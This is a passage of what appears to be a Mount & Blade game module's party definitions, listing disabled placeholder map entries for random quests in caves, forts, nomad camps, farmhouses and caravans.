("rand_quest_cave_14", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_15", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_16", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_17", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_18", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_19", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_20", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_21", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_22", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_23", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_24", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_25", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_26", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_27", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_28", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_29", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_30", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_31", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_32", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_33", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_34", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_35", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_36", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_37", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_38", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_39", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_40", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_41", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_42", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_43", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_44", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_45", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_46", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_47", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_48", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_49", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_50", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_end", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_01", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_02", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_03", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_04", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_05", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_06", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_07", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_08", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_09", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_10", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_11", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_12", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_13", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_14", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_15", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_16", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_17", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_18", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_19", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_20", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_21", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_22", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_23", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_24", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_25", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_26", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_27", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_28", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_29", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_30", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_31", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_32", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_33", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_34", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_35", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_36", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_37", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_38", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_39", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_40", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_end", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_rescue_lady_01", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_rescue_lady_02", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_rescue_lady_03", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_rescue_lady_end", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_01", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_02", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_03", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_04", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_05", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_06", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_07", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_08", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_09", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_10", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_11", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_12", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_13", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_14", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_15", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_16", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_17", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_18", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_19", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_20", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_end", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_01", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_02", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_03", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_04", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_05", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_06", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_07", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_08", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_09", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_10", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_11", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_12", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_13", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_14", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_15", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_16", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_17", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_18", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_19", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_20", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_21", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_22", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_23", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_24", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_25", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_26", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_27", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_28", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_29", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_30", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_end", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_01", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_02", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_03", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_04", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_05", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_06", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_07", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_08", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_09", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_10", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_11", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_12", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_13", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
